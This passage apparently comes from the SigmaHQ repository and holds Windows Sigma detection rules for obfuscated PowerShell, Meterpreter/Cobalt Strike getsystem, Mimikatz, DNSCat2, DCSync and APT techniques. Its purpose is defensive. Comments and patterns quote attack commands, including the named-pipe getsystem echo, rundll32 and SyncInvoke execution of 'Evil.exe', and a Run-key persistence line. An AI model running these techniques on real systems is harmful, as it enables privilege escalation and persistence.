    "content": "title: Invoke-Obfuscation Via Stdin\nid: 82b66143-53ee-4369-ab02-de2c70cd6352\nrelated:\n    - id: 487c7524-f892-4054-b263-8a0ace63fc25\n      type: derived\ndescription: Detects Obfuscated Powershell via Stdin in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/12\nmodified: 2023/04/23\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task28)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_use_clip_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Clip\nid: 1fc02cb5-8acf-4d2c-bf9c-a28b6e0ad851\nrelated:\n    - id: 63e3365d-4824-42d8-8b82-e56810fefa0c\n      type: derived\ndescription: Detects Obfuscated Powershell via use Clip.exe in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/09\nmodified: 2022/04/26\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task29)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains: '(Clipboard|i'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_use_mshta_services.yml",
    "content": "title: Invoke-Obfuscation Via Use MSHTA\nid: a4e82ad2-7430-4ee8-b858-6ad6099773fa\nrelated:\n    - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4\n      type: derived\ndescription: Detects Obfuscated Powershell via use MSHTA in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/09\nmodified: 2022/03/08\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task31)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all:\n            - 'set'\n            - '&&'\n            - 'mshta'\n            - 'vbscript:createobject'\n            - '.run'\n            - '(window.close)'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_use_rundll32_services.yml",
    "content": "title: Invoke-Obfuscation Via Use Rundll32\nid: 4e1518d9-2136-4015-ab49-c31d7c8588e1\nrelated:\n    - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b\n      type: derived\ndescription: Detects Obfuscated Powershell via use Rundll32 in Scripts\nstatus: unsupported\nauthor: Nikita Nazarov, oscd.community\ndate: 2020/10/09\nmodified: 2022/03/08\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task30)\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains|all: \n            - '&&'\n            - 'rundll32'\n            - 'shell32.dll'\n            - 'shellexec_rundll'\n        ImagePath|contains:     \n            - 'value'\n            - 'invoke'\n            - 'comspec'\n            - 'iex'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\n"
  },
  {
    "path": "unsupported/windows/driver_load_invoke_obfuscation_via_var++_services.yml",
    "content": "title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION\nid: 7b9a650e-6788-4fdf-888d-ec7c0a62810d\nrelated:\n    - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6\n      type: derived\ndescription: Detects Obfuscated Powershell via VAR++ LAUNCHER\nstatus: unsupported\nauthor: Timur Zinniatullin, oscd.community\ndate: 2020/10/13\nmodified: 2021/09/18\nreferences:\n    - https://github.com/SigmaHQ/sigma/issues/1009 #(Task27)\ntags:\n    - attack.defense_evasion\n    - attack.t1027\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|re: '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\\\"\\s+?\\-f.*&&.*cmd.*\\/c' # FPs with |\\/r\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml",
    "content": "title: Meterpreter or Cobalt Strike Getsystem Service Installation\nid: d585ab5a-6a69-49a8-96e8-4a726a54de46\nrelated:\n    - id: 843544a7-56e0-4dcc-a44f-5cc266dd97d6\n      type: derived\nstatus: unsupported\ndescription: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nauthor: Teymur Kheirkhabarov, Ecco, Florian Roth\ndate: 2019/10/26\nmodified: 2022/12/22\ntags:\n    - attack.privilege_escalation\n    - attack.t1134.001\n    - attack.t1134.002\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        # meterpreter getsystem technique 1: cmd.exe /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        - ImagePath|contains|all:\n            - 'cmd'\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        # cobaltstrike getsystem technique 1: %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        - ImagePath|contains|all:\n            - '%COMSPEC%'\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        # cobaltstrike getsystem technique 1b (expanded %COMSPEC%): %COMSPEC% /c echo 559891bb017 > \\\\.\\pipe\\5e120a\n        - ImagePath|contains|all:\n            - 'cmd.exe'\n            - '/c'\n            - 'echo'\n            - '\\pipe\\'\n        # meterpreter getsystem technique 2: rundll32.exe C:\\Users\\test\\AppData\\Local\\Temp\\tmexsn.dll,a /p:tmexsn\n        - ImagePath|contains|all:\n            - 'rundll32'\n            - '.dll,a'\n            - '/p:'\n    condition: selection\nfields:\n    - ComputerName\n    - SubjectDomainName\n    - SubjectUserName\n    - ImagePath\nfalsepositives:\n    - Highly unlikely\nlevel: critical"
  },
  {
    "path": "unsupported/windows/driver_load_tap_driver_installation.yml",
    "content": "title: Tap Driver Installation\nid: 8bd47424-53e9-41ea-8a6a-a1f97b1bb0eb\nrelated:\n    - id: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9\n      type: derived\ndescription: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques\nstatus: unsupported\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019/10/24\nmodified: 2021/09/21\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    category: driver_load\ndetection:\n    selection:\n        ImagePath|contains: 'tap0901'\n    condition: selection\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/file_event_executable_and_script_creation_by_office_using_file_ext.yml",
    "content": "title: File Creation by Office Applications\nid: 8c6fd6fc-28fc-4597-a86a-fc1de20b039d\ndescription: This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.\nreferences:\n    - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\n    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml\nauthor: \"Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)\"\ntags:\n    - attack.t1204.002\n    - attack.t1047\n    - attack.t1218.010\n    - attack.execution\n    - attack.defense_evasion\nstatus: experimental\ndate: 2021/08/23\nmodified: 2022/06/02\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    #useful_information: Please add more file extensions and magic bytes to the logic of your choice.\n    selection1:\n        Image|endswith:\n            - '\\winword.exe'\n            - '\\excel.exe'\n            - '\\powerpnt.exe'\n            - '\\outlook.exe'\n    selection2:\n        FileName|endswith:\n            - \".exe\"\n            - \".dll\"\n            - \".ocx\"\n            - \".com\"\n            - \".ps1\"\n            - \".vbs\"\n            - \".sys\"\n            - \".bat\"\n            - \".scr\"\n            - \".proj\"\n    selection3:\n        FileMagicBytes|startswith:\n            - \"4D5A\"\n    condition: selection1 and (selection2 or selection3)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/image_load_mimikatz_inmemory_detection.yml",
    "content": "title: Mimikatz In-Memory\nid: c0478ead-5336-46c2-bd5e-b4c84bc3a36e\nstatus: unsupported\ndescription: Detects certain DLL loads when Mimikatz gets executed\nreferences:\n    - https://securityriskadvisors.com/blog/post/detecting-in-memory-mimikatz/\nauthor: sigma\ndate: 2017/03/13\nmodified: 2023/02/24\ntags:\n    - attack.s0002\n    - attack.t1003\n    - attack.lateral_movement\n    - attack.credential_access\n    - car.2019-04-004\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selector:\n        Image: 'C:\\Windows\\System32\\rundll32.exe'\n    dllload1:\n        ImageLoaded|endswith: '\\vaultcli.dll'\n    dllload2:\n        ImageLoaded|endswith: '\\wlanapi.dll'\n    exclusion:\n        ImageLoaded:\n            - 'ntdsapi.dll'\n            - 'netapi32.dll'\n            - 'imm32.dll'\n            - 'samlib.dll'\n            - 'combase.dll'\n            - 'srvcli.dll'\n            - 'shcore.dll'\n            - 'ntasn1.dll'\n            - 'cryptdll.dll'\n            - 'logoncli.dll'\n    timeframe: 30s\n    condition: selector | near dllload1 and dllload2 and not exclusion\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/posh_ps_cl_invocation_lolscript_count.yml",
    "content": "title: Execution via CL_Invocation.ps1 (2 Lines)\nid: f588e69b-0750-46bb-8f87-0e9320d57536\nstatus: unsupported\ndescription: Detects Execution via SyncInvoke in CL_Invocation.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/\n    - https://twitter.com/bohops/status/948061991012327424\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/02/24\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'CL_Invocation.ps1'\n            - 'SyncInvoke'\n    condition: selection | count(ScriptBlockText) by Computer > 2\n    # PS > Import-Module c:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1\n    # PS > SyncInvoke c:\\Evil.exe\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/posh_ps_cl_mutexverifiers_lolscript_count.yml",
    "content": "title: Execution via CL_Mutexverifiers.ps1 (2 Lines)\nid: 6609c444-9670-4eab-9636-fe4755a851ce\nstatus: unsupported\ndescription: Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module\nreferences:\n    - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/\n    - https://twitter.com/pabraeken/status/995111125447577600\nauthor: oscd.community, Natalia Shornikova\ndate: 2020/10/14\nmodified: 2023/02/24\ntags:\n    - attack.defense_evasion\n    - attack.t1216\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'CL_Mutexverifiers.ps1'\n            - 'runAfterCancelProcess'\n    condition: selection | count(ScriptBlockText) by Computer > 2\n    # PS > Import-Module c:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1\n    # PS > runAfterCancelProcess c:\\Evil.exe\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_apt_silence_downloader_v3.yml",
    "content": "title: Silence.Downloader V3\nid: 170901d1-de11-4de7-bccb-8fa13678d857\nstatus: unsupported\ndescription: Detects Silence downloader. These commands are hardcoded into the binary.\nauthor: Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community\ndate: 2019/11/01\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.t1547.001\n    - attack.discovery\n    - attack.t1057\n    - attack.t1082\n    - attack.t1016\n    - attack.t1033\n    - attack.g0091\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_recon:\n        Image|endswith:\n            - '\\tasklist.exe'\n            - '\\qwinsta.exe'\n            - '\\ipconfig.exe'\n            - '\\hostname.exe'\n        CommandLine|contains: '>>'\n        CommandLine|endswith: 'temps.dat'\n    selection_persistence:\n        CommandLine|contains: '/C REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WinNetworkSecurity\" /t REG_SZ /d'\n    condition: selection_recon | near selection_persistence # requires both\nfields:\n    - ComputerName\n    - User\n    - Image\n    - CommandLine\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_apt_turla_commands_medium.yml",
    "content": "title: Automated Turla Group Lateral Movement\nid: 75925535-ca97-4e0a-a850-00b5c00779dc\nstatus: unsupported\ndescription: Detects automated lateral movement by Turla group\nreferences:\n    - https://securelist.com/the-epic-turla-operation/65545/\nauthor: Markus Neis\ndate: 2017/11/07\nmodified: 2023/02/24\ntags:\n    - attack.g0010\n    - attack.execution\n    - attack.t1059\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.discovery\n    - attack.t1083\n    - attack.t1135\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    netCommand1:\n        CommandLine: 'net view /DOMAIN'\n    netCommand2:\n        CommandLine: 'net session'\n    netCommand3:\n        CommandLine: 'net share'\n    timeframe: 1m\n    condition: netCommand1 | near netCommand2 and netCommand3\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_dnscat2_powershell_implementation.yml",
    "content": "title: DNSCat2 Powershell Implementation Detection Via Process Creation\nid: b11d75d6-d7c1-11ea-87d0-0242ac130003\nstatus: unsupported\ndescription: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.\nreferences:\n    - https://github.com/lukebaggett/dnscat2-powershell\n    - https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html\n    - https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html\nauthor: Cian Heasley\ndate: 2020/08/08\nmodified: 2023/02/24\ntags:\n    - attack.command_and_control\n    - attack.t1071\n    - attack.t1071.004\n    - attack.t1001.003\n    - attack.t1041\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\nslookup.exe'\n        CommandLine|endswith: '\\nslookup.exe'\n    condition: selection | count(Image) by ParentImage > 100\nfields:\n    - Image\n    - CommandLine\n    - ParentImage\nfalsepositives:\n    - Other powershell scripts that call nslookup.exe\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_multiple_susp_cli.yml",
    "content": "title: Quick Execution of a Series of Suspicious Commands\nid: 61ab5496-748e-4818-a92f-de78e20fe7f1\nstatus: unsupported\ndescription: Detects multiple suspicious processes in a limited timeframe\nreferences:\n    - https://car.mitre.org/wiki/CAR-2013-04-002\nauthor: juju4\ndate: 2019/01/16\nmodified: 2023/02/24\ntags:\n    - car.2013-04-002\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - arp.exe\n            - at.exe\n            - attrib.exe\n            - cscript.exe\n            - dsquery.exe\n            - hostname.exe\n            - ipconfig.exe\n            - mimikatz.exe\n            - nbtstat.exe\n            - net.exe\n            - netsh.exe\n            - nslookup.exe\n            - ping.exe\n            - quser.exe\n            - qwinsta.exe\n            - reg.exe\n            - runas.exe\n            - sc.exe\n            - schtasks.exe\n            - ssh.exe\n            - systeminfo.exe\n            - taskkill.exe\n            - telnet.exe\n            - tracert.exe\n            - wscript.exe\n            - xcopy.exe\n            - pscp.exe\n            - copy.exe\n            - robocopy.exe\n            - certutil.exe\n            - vssadmin.exe\n            - powershell.exe\n            - pwsh.exe\n            - wevtutil.exe\n            - psexec.exe\n            - bcedit.exe\n            - wbadmin.exe\n            - icacls.exe\n            - diskpart.exe\n    timeframe: 5m\n    condition: selection | count() by MachineName > 5\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: low\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_susp_builtin_commands_recon.yml",
    "content": "title: Reconnaissance Activity Using BuiltIn Commands\nid: 2887e914-ce96-435f-8105-593937e90757\nstatus: unsupported\ndescription: Detects execution of a set of builtin commands often used in recon stages by different attack groups\nreferences:\n    - https://twitter.com/haroonmeer/status/939099379834658817\n    - https://twitter.com/c_APT_ure/status/939475433711722497\n    - https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html\nauthor: Florian Roth (Nextron Systems), Markus Neis\ndate: 2018/08/22\nmodified: 2023/02/24\ntags:\n    - attack.discovery\n    - attack.t1087\n    - attack.t1082\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine:\n            - tasklist\n            - net time\n            - systeminfo\n            - whoami\n            - nbtstat\n            - net start\n            - qprocess\n            - nslookup\n            - hostname.exe\n            - 'netstat -an'\n        - CommandLine|endswith:\n            - '\\net1 start'\n            - '\\net1 user /domain'\n            - '\\net1 group /domain'\n            - '\\net1 group \"domain admins\" /domain'\n            - '\\net1 group \"Exchange Trusted Subsystem\" /domain'\n            - '\\net1 accounts /domain'\n            - '\\net1 user net localgroup administrators'\n    timeframe: 15s\n    condition: selection | count() by CommandLine > 4\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml",
    "content": "title: MSI Spawned Cmd and Powershell Spawned Processes\nid: 38cf8340-461b-4857-bf99-23a41f772b18\ndescription: This rule looks for the Windows Installer service (msiexec.exe) spawning cmd.exe and/or powershell.exe that in turn spawns other processes\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020/10/13\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg\n    - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\ntags:\n    - attack.privilege_escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\n    definition: Works only if Sysmon events are enriched with additional information about the process in ParentOfParentImage (see the enrichment section)\ndetection:\n    parent_image:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n    parent_of_parent_image:\n        ParentOfParentImage|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        ParentOfParentImage|endswith:\n            - 'tmp'\n    condition: parent_image and parent_of_parent_image\nfields:\n    - ParentImage\n    - ParentOfParentImage\nfalsepositives:\n    - Unknown\nlevel: high\nenrichment:\n    - EN_0001_cache_sysmon_event_id_1_info                # http://bit.ly/314zc6x\n    - EN_0002_enrich_sysmon_event_id_1_with_parent_info   # http://bit.ly/2KmSC0l\n"
  },
  {
    "path": "unsupported/windows/sysmon_always_install_elevated_parent_child_correlated.yml",
    "content": "title: Always Install Elevated Parent Child Correlated\nid: 078235c5-6ec5-48e7-94b2-f8b5474379ea\ndescription: This rule looks for any low-privilege process launching the Windows Installer service (msiexec.exe) that then tries to install MSI packages with SYSTEM privilege\n# look for an MSI start by a low-privilege user and write the process guid to the suspicious_guid variable\n# look for a child process of the suspicious_guid; alert if it is Windows Installer trying to install a package with SYSTEM privilege\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020/10/13\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg\ntags:\n    - attack.privilege_escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    system_integrity:\n        IntegrityLevel: 'System'\n    system_user:\n        User: 'NT AUTHORITY\\SYSTEM'\n    image_1:\n        Image|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        Image|endswith:\n            - 'tmp'\n    image_2:\n        Image|endswith: '\\msiexec.exe'\n    child_of_suspicious_guid:\n        ParentProcessGuid: '%suspicious_guid%'\n    condition: write ProcessGuid from (event_id and image_2 and not system_user) to %suspicious_guid%; then if (child_of_suspicious_guid and event_id and image_1 and system_user) or (suspicious_guid and event_id and image_2 and system_user and integrity_level) -> alert\nfields:\n    - EventID\n    - IntegrityLevel\n    - User\n    - Image\n    - ParentProcessGuid\nfalsepositives:\n    - System administrator usage\nlevel: high"
  },
  {
    "path": "unsupported/windows/sysmon_non_priv_program_files_move.yml",
    "content": "title: Files Dropped to Program Files by Non-Privileged Process\nid: d6d9f4fb-4c1c-4f53-b306-62a22c7c61e1\ndescription: Search for dropping of files to Windows/Program Files folders by non-privileged processes\nstatus: experimental\nauthor: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community\ndate: 2020/10/17\nmodified: 2021/08/14\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg\ntags:\n    - attack.persistence\n    - attack.defense_evasion\n    - attack.t1574\n    - attack.t1574.010\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    integrity:\n        IntegrityLevel: 'Medium'\n    program_files:\n        TargetFilename|contains:\n            - '\\Program Files\\'\n            - '\\Program Files (x86)\\'\n    windows:\n        TargetFilename|startswith: '\\Windows\\'\n    temp:\n        TargetFilename|contains: 'temp'\n    condition: integrity and (program_files or windows and not temp)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/sysmon_process_reimaging.yml",
    "content": "action: global\ntitle: Defense evasion via process reimaging\nid: 7fa4f550-850e-4117-b543-428c86ebb849\ndescription: Detects the process reimaging defense evasion technique\n# where\n#             selection1: ImageFileName != selection1: OriginalFileName\n#             selection1: ParentProcessGuid = selection2: ProcessGuid\n#             selection1: Image = selection2: TargetFilename\n# and the new field ImageFileName comes from enrichment\n#             selection1: Image = ^.+\\\\<ImageFileName>$\n# Rule must trigger if selection1 and selection2 both occur within a timeframe of 120 sec.\n# Rule logic is currently not supported by SIGMA.\n# Sysmon v.10.0 or newer is required for proper detection.\nstatus: unsupported\nauthor: Alexey Balandin, oscd.community\nreferences:\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\ntags:\n    - attack.defense_evasion\ndate: 2019/10/25\nmodified: 2021/12/02\ndetection:\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n---\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection1:\n        category: process_creation\nfields:\n    - Image\n    - OriginalFileName\n    - ParentProcessGuid\nnew_fields:\n    - ImageFileName\n---\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection2:\n        EventID: 11\nfields:\n    - ProcessGuid\n    - TargetFilename\n"
  },
  {
    "path": "unsupported/windows/win_access_fake_files_with_stored_credentials.yml",
    "content": "title: Stored Credentials in Fake Files\nid: 692b979c-f747-41dc-ad72-1f11c01b110e\ndescription: Search for accessing of fake files with stored credentials\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community\ndate: 2020/10/05\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-13-638.jpg\ntags:\n    - attack.credential_access\n    - attack.t1555\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4663\n        AccessList|contains: '%%4416'\n        ObjectName|endswith:\n            - '\\%POLICY_ID%\\Machine\\Preferences\\Groups\\Groups.xml'\n            - '\\%FOLDER_NAME%\\Unattend.xml'\n    condition: selection\nfields:\n    - EventID\n    - AccessList\n    - ObjectName\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/win_apt_apt29_tor.yml",
    "content": "action: global\ntitle: APT29 Google Update Service Install\ndescription: This method detects malicious services mentioned in the APT29 report by FireEye. The legitimate path for the Google update service is C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe,\n    so the service names and executable locations used by APT29 are specific enough to be detected in log files.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html\ntags:\n    - attack.persistence\n    - attack.g0016\n    - attack.t1050          # an old one\n    - attack.t1543.003\ndate: 2017/11/01\nmodified: 2022/03/21\nauthor: Thomas Patzke\nstatus: unsupported\nlogsource:\n    product: windows\n    service: system\ndetection:\n    service_install:\n        EventID: 7045\n        Provider_Name: 'Service Control Manager'\n        ServiceName: 'Google Update'\n    timeframe: 5m\n    condition: service_install | near process\nfalsepositives:\n    - Unknown\nlevel: high\n---\nid: c069f460-2b87-4010-8dcf-e45bab362624\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    process:\n        Image:\n            - 'C:\\Program Files(x86)\\Google\\GoogleService.exe'\n            - 'C:\\Program Files(x86)\\Google\\GoogleUpdate.exe'\nfields:\n    - ComputerName\n    - User\n    - CommandLine\n"
  },
  {
    "path": "unsupported/windows/win_dumping_ntdsdit_via_dcsync.yml",
    "content": "title: Dumping ntds.dit remotely via DCSync\nid: 51238c62-2b29-4539-ad75-e94575368a12\ndescription: Detects retrieval of ntds.dit by synchronising with a legitimate domain controller using the Directory Replication Service Remote Protocol\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019/10/24\nmodified: 2019/11/13\nreferences:\n    - https://twitter.com/gentilkiwi/status/1003236624925413376\n    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4624\n        ComputerName: '%DomainControllersNamesList%'\n    selection2:\n        IpAddress: '%DomainControllersIpsList%'\n    selection3:\n        EventID: 4662\n        ComputerName: '%DomainControllersNamesList%'\n        SubjectLogonId: '%SuspiciousTargetLogonIdList%'\n        Properties|contains:\n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n    condition: write TargetLogonId from selection1 (if not selection2) to list %SuspiciousTargetLogonIdList%; then if selection3 -> alert\nfalsepositives:\n    - Legitimate administrator adding new domain controller to already existing domain\nlevel: medium\nstatus: unsupported\n"
  },
  {
    "path": "unsupported/windows/win_dumping_ntdsdit_via_netsync.yml",
    "content": "title: Dumping ntds.dit remotely via NetSync\nid: 757b2a11-73e7-411a-bd46-141d906e0167\ndescription: Detects retrieval of ntds.dit (computer accounts only) by synchronising with a legitimate domain controller using the Netlogon Remote Protocol\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019/11/01\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4624\n        ComputerName: '%DomainControllersNamesList%'\n    selection2:\n        IpAddress: '%DomainControllersIpsList%'\n    selection3:\n        EventID: 5145\n        ComputerName: '%DomainControllersNamesList%'\n        ShareName|contains: '\\IPC$'\n        SubjectLogonId: '%SuspiciousTargetLogonIdList%'\n        RelativeTargetName: 'netlogon'\n    condition: write TargetLogonId from selection1 (if not selection2) to list %SuspiciousTargetLogonIdList%; then if selection3 -> alert\nfalsepositives:\n    - Legitimate administrator adding new domain controller to already existing domain\nlevel: medium\nstatus: unsupported\n"
  },
  {
    "path": "unsupported/windows/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml",
    "content": "title: Windows Kernel and 3rd-Party Drivers Exploits Token Stealing\nid: 8065b1b4-1778-4427-877f-6bf948b26d38\ndescription: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (source), Daniil Yugoslavskiy (rule)\ndate: 2019/06/03\nlogsource:\n    category: process_creation\n    product: windows\n    definition: Works only if Sysmon events are enriched with additional information about the process in ParentIntegrityLevel (see the enrichment section)\ndetection:\n    selection:\n        ParentIntegrityLevel: Medium\n        IntegrityLevel: System\n        User: \"NT AUTHORITY\\\\SYSTEM\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/win_mal_service_installs.yml",
